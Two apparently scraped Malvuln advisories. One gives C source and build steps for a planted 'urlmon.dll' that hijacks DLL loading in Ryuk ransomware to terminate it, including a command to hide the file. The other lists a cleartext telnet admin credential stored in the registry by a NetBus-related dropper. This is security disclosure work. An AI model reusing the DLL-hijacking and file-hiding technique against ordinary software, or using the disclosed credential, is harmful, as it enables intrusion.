    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/5ac0f050f93f86e69026faea1fbb4450.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Trojan.Ransom.Ryuk.AVulnerability: Arbitrary Code ExecutionDescription: The ransomware looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vuln DLL execute our own code, control and terminate the malware pre-encryption. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.Family: RyukType: PE32MD5: 5ac0f050f93f86e69026faea1fbb4450Vuln ID: MVID-2022-0640Disclosure: 09/19/2022Exploit/PoC:1) Compile the following C code as "urlmon.dll"2) Place the DLL in same directory as the ransomware3) Optional - Hide it: attrib +s +h "urlmon.dll"4) Run the malware#include "windows.h"//By malvuln//Purpose: Exploit Ryuk/** DISCLAIMER:Author is NOT responsible for any damages whatsoever by using this software or improper malwarehandling. By using this code you assume and accept all risk implied or otherwise.**///gcc -c urlmon.c -m32//gcc -shared -o urlmon.dll urlmon.o -m32BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){  switch (reason) {  case DLL_PROCESS_ATTACH:   MessageBox(NULL, "Ryuk\nPWNED By MALVULN", "Code Exec PoC", MB_OK);   TCHAR buf[MAX_PATH];   GetCurrentDirectory(MAX_PATH, TEXT(buf));   int rc = strcmp("C:\\Windows\\System32", TEXT(buf));     if(rc != 0){     HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());     if (NULL != handle) {           TerminateProcess(handle, 0);       CloseHandle(handle);     }   }    break;  }  return TRUE;}Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Trojan.Ransom.Ryuk.A MVID-2022-0640 Code Execution

Trojan-Dropper.Win32.Corty.10 malware suffers from an insecure credential storage vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/f72138e574743640bdcdb9f102dff0a5.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Trojan-Dropper.Win32.Corty.10Vulnerability: Insecure Credential StorageDescription: The malware stores its credentials in cleartext within the Windows registry.Family: CortyType: PE32MD5: f72138e574743640bdcdb9f102dff0a5Vuln ID: MVID-2022-0639Dropped files: TMP205880.EXEDisclosure: 09/19/2022Exploit/PoC:Computer\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\UltraAccess Networks\NetBus Server\TelnetLogin\AdminPassword\1234Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Tag

#windows